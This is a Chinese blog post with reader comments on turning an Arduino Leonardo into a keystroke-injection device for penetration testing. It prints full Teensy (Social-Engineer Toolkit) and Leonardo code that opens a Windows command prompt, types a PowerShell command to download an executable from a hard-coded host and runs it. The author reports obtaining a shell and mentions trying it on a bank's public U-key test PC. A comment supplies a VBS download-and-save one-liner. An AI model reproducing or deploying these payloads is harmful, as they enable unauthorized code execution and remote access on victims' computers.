[极客有意思]使用arduino进行渗透测试

2012-11-10 534804人围观 ,发现 58 个不明物体 极客终端安全

Arduino 是一款便捷灵活、方便上手的开源电子原型平台,包含硬件(各种型号的arduino板)和软件(arduino IDE)。它适用于艺术家、设计师、爱好者和对于“互动”有兴趣的朋友们。arduino官网:http://www.arduino.cc/

这个渗透思想源于前两周去银行更换U盾。

银行办理业务的地方都会有一个测试U盾的PC,用于检验U盾和激活,我运气比较背,正好碰上一个坏的。U盾插上后会自动启动一些应用,那么我们也可以做这样一个东西来启动并执行我们想要东西。

U盘中的autorun.inf可以做到。arduino也可以做到。
在做机器人的时候买了并了解了arduino,做机器人主要是为了拍妹纸。

arduino的板子种类也比较多。我使用的是arduino leonardo.

 

现在用它来做渗透。
主要思想是用它来做一个能自动敲东西的键盘。

Social-Engineer Toolkit有这个功能,不过它使用的是teensy这个板子,很小,和arduino leonardo都是使用的 ATMEGA32U4芯片。

这两天我一直在尝试将set生成的代码直接放到arduino leonardo上运行,由于不会编程,没有成功。

不过我还是用set,这样可以少敲很多命令。

 

它生成的teensy代码如下:

//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
//
// 2011-02-28 padzero@gmail.com
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7
//


// Typed into the Windows Run dialog by setup() -> omg(). The first string
// downloads a file from the hard-coded URL with System.Net.WebClient and
// saves it under %HOMEPATH%; the second launches that file. Both are typed
// as ALT keypad codes (ascii_type_this), which is what the header above
// refers to as working on non-English keymaps.
char convert[4] = "000"; // do not change this -- not referenced by any code shown on this page
char command1[] = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://10.1.1.172/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);";
char command2[] = "%HOMEPATH%\\x.exe";

// Teensy entry point: runs once at power-on and performs the whole keystroke
// sequence; loop() below is intentionally empty. Every step is a raw HID
// report (set_key1/set_modifier + send_now), so timing is done with delays.
void setup() { 
    delay(5000);                      // presumably gives the host time to enumerate the keyboard
    omg(command1);                    // Win+R, type the download command, Enter
    Keyboard.set_key1(KEY_ENTER);     // a second Enter (omg() already pressed one)
    Keyboard.send_now();
    delay(15000);                     // allow the download to complete before launching
    // run this executable
    omg(command2);
    delay(2000);
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_ENTER);     // Ctrl+Enter; why the modifier is needed is not evident from the code
    Keyboard.send_now();
    Keyboard.set_modifier(0);         // release modifier and key slot, send the empty report
    Keyboard.set_key1(0); 
    Keyboard.send_now(); 
    delay(1000000);                   // park for ~16.7 minutes; nothing else runs afterwards
  }
void loop() {} // Intentionally empty: setup() performs the whole sequence once.

// Type a NUL-terminated string one character at a time. Each character is
// first mapped to its decimal ALT code (ascii_convert) and then entered on
// the numeric keypad (ascii_input). Characters without a table entry are
// printed directly by ascii_convert, which then returns the "000" sentinel
// so ascii_input types nothing for them.
void ascii_type_this(char *string)
{
  for (const char *cursor = string; *cursor != '\0'; ++cursor)
  {
    ascii_input(ascii_convert(*cursor));
  }
}

// Enter one ALT code: hold ALT, tap each decimal digit on the numeric keypad
// (11 ms between reports), then release everything. A character that is not
// a digit sets no key, but the press/release reports are still sent.
// The "000" sentinel from ascii_convert() means "nothing to type".
// NOTE(review): `string == "000"` compares pointers, not contents, so the
// early return only fires when the compiler merges this literal with the one
// ascii_convert() returns; otherwise ALT+0,0,0 is entered.
void ascii_input(char *string)
{
  if (string == "000") return;
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  for (const char *digit = string; *digit != '\0'; ++digit)
  {
    switch (*digit)
    {
      case '0': Keyboard.set_key1(KEYPAD_0); break;
      case '1': Keyboard.set_key1(KEYPAD_1); break;
      case '2': Keyboard.set_key1(KEYPAD_2); break;
      case '3': Keyboard.set_key1(KEYPAD_3); break;
      case '4': Keyboard.set_key1(KEYPAD_4); break;
      case '5': Keyboard.set_key1(KEYPAD_5); break;
      case '6': Keyboard.set_key1(KEYPAD_6); break;
      case '7': Keyboard.set_key1(KEYPAD_7); break;
      case '8': Keyboard.set_key1(KEYPAD_8); break;
      case '9': Keyboard.set_key1(KEYPAD_9); break;
      default: break; // not a digit: the key slot keeps its (cleared) value
    }
    Keyboard.send_now();      // press
    Keyboard.set_key1(0);
    delay(11);
    Keyboard.send_now();      // release
  }
  Keyboard.set_modifier(0);   // let go of ALT and send the empty report
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// Map one printable ASCII character (' ' through '~') to its decimal code
// as a digit string, so the caller can enter it as a Windows ALT+keypad
// code. Any other character is sent straight to the host with
// Keyboard.print() and the sentinel "000" is returned, which ascii_input()
// treats as "nothing to type".
// The char* return type is kept only for the existing callers: every
// returned pointer refers to a string literal and must not be written to.
char* ascii_convert(char string)
{
  // kAltCodes[c - ' '] is the decimal code of printable character c.
  static const char* const kAltCodes[] = {
    // ' ' .. '/'
    "32", "33", "34", "35", "36", "37", "38", "39",
    "40", "41", "42", "43", "44", "45", "46", "47",
    // '0' .. '9'
    "48", "49", "50", "51", "52", "53", "54", "55", "56", "57",
    // ':' .. '@'
    "58", "59", "60", "61", "62", "63", "64",
    // 'A' .. 'Z'
    "65", "66", "67", "68", "69", "70", "71", "72", "73", "74", "75", "76", "77",
    "78", "79", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "90",
    // '[' .. '`'
    "91", "92", "93", "94", "95", "96",
    // 'a' .. 'z'
    "97", "98", "99", "100", "101", "102", "103", "104", "105", "106", "107", "108", "109",
    "110", "111", "112", "113", "114", "115", "116", "117", "118", "119", "120", "121", "122",
    // '{' .. '~'
    "123", "124", "125", "126"
  };

  if (string >= ' ' && string <= '~')
  {
    return const_cast<char*>(kAltCodes[string - ' ']);
  }

  // Outside the table (control characters or non-ASCII bytes): type the
  // character directly and report that there is no ALT code to enter.
  Keyboard.print(string);
  return const_cast<char*>("000");
}

// Clear the modifier byte and the key slot, send the empty (all-released)
// report, then wait 100 ms. Used by send_keys(); setup()/omg() on this page
// release keys inline instead of calling it.
void release_keys()
{
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

// Press `key` (optionally with `modifier`), hold the report for 100 ms, then
// release everything via release_keys(). A zero modifier leaves whatever
// modifier state was set earlier untouched rather than clearing it.
// Not called by the code shown on this page.
void send_keys(byte key, byte modifier)
{
  if(modifier)
    Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(100);
  release_keys();   
}

// Open the Windows Run dialog (GUI modifier + R), type SomeCommand as ALT
// codes, and press Enter to execute it. Called twice from setup().
void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128);   // 0x80 = bit 7 of the HID modifier byte (Right GUI / Windows key)
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0);     // release both and send the empty report
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);                  // wait for the Run dialog to appear before typing
  ascii_type_this(SomeCommand);
  Keyboard.set_key1(KEY_ENTER); // Enter, then release
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
由于两种板子的代码不能直接通用,我自己写了新的代码。
// The Windows (left GUI) key. Despite the name this is not Ctrl.
char ctrlKey = KEY_LEFT_GUI;// win key
// Arduino Leonardo entry point: start the USB HID keyboard. All keystrokes
// are sent from loop().
void setup() {
  Keyboard.begin();
}

// Leonardo version of the sequence, using the higher-level Keyboard
// press/release/print API instead of raw HID reports. It runs once: the
// trailing while(1) never returns, so loop() is not re-entered.
void loop() {
  delay(500);                    // ~2.5 s total start-up wait before the first keystroke
  delay(1000);
  delay(1000);
   Keyboard.press(ctrlKey);      // Win+R: open the Run dialog
   Keyboard.press('r');
   delay(100);
   Keyboard.release(ctrlKey);
   Keyboard.release('r');
   delay(1000);
   delay(1000);
   Keyboard.print("cmd");        // launch a command prompt
   Keyboard.println();           // println() ends with Enter ...
   delay(1000);
   Keyboard.write(KEY_RETURN);   // ... and a second Enter is sent into the new window
   delay(2000);
   Keyboard.write(KEY_LEFT_SHIFT); // a lone Shift tap; its purpose is not evident from the code
   delay(500);
   // Download to C:\x.exe (the Teensy version above used %HOMEPATH% instead).
   Keyboard.print("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://10.1.1.172/x.exe';$file = ' C:\\x.exe ';$clnt.DownloadFile($url,$file);");
   delay(100);
   Keyboard.println();
   delay(2000);                  // no check that the download finished; a fixed wait only
   Keyboard.print("C:\\x.exe");  // run the downloaded file
   delay(100);
   Keyboard.println();
   while(1){};                   // park forever so the sequence is not repeated
}
将代码通过arduino IDE编译后写入硬件。

测试了下set没有启动httpd服务,我自己去生成一个马儿并启动httpd服务

插上arduino

在windows server 2008 R2上自动启动cmd。

自动“敲”入并执行命令

成功获得shell.

目前的arduino板子中只有leonardo支持keyboard库,
其他型号似乎也可以通过virtual-usb-keyboard来支持,但我没有测试,不知道是否可行。

银行放在外面的那个PC使用powershell做wget使用的方式还没法搞,XP没有powershell。不过有IE,有机会去试一试。

这些评论亮了

  • BinAry (3级) 研究2.4GHz无线网络安全、RFID安全、NFC安全以及移... 回复
    Talk is cheap。
    支持这种共享精神,这些玩法也很值得深入扩展。
    后面的下载执行可以采用vbs。毕竟powershell只在vista以上系统才自带。
  • BinAry (3级) 研究2.4GHz无线网络安全、RFID安全、NFC安全以及移... 回复
    @BinAry 
    echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >get.vbs
    用法:cscript get.vbs http://xxoo.com/xxoo x.exe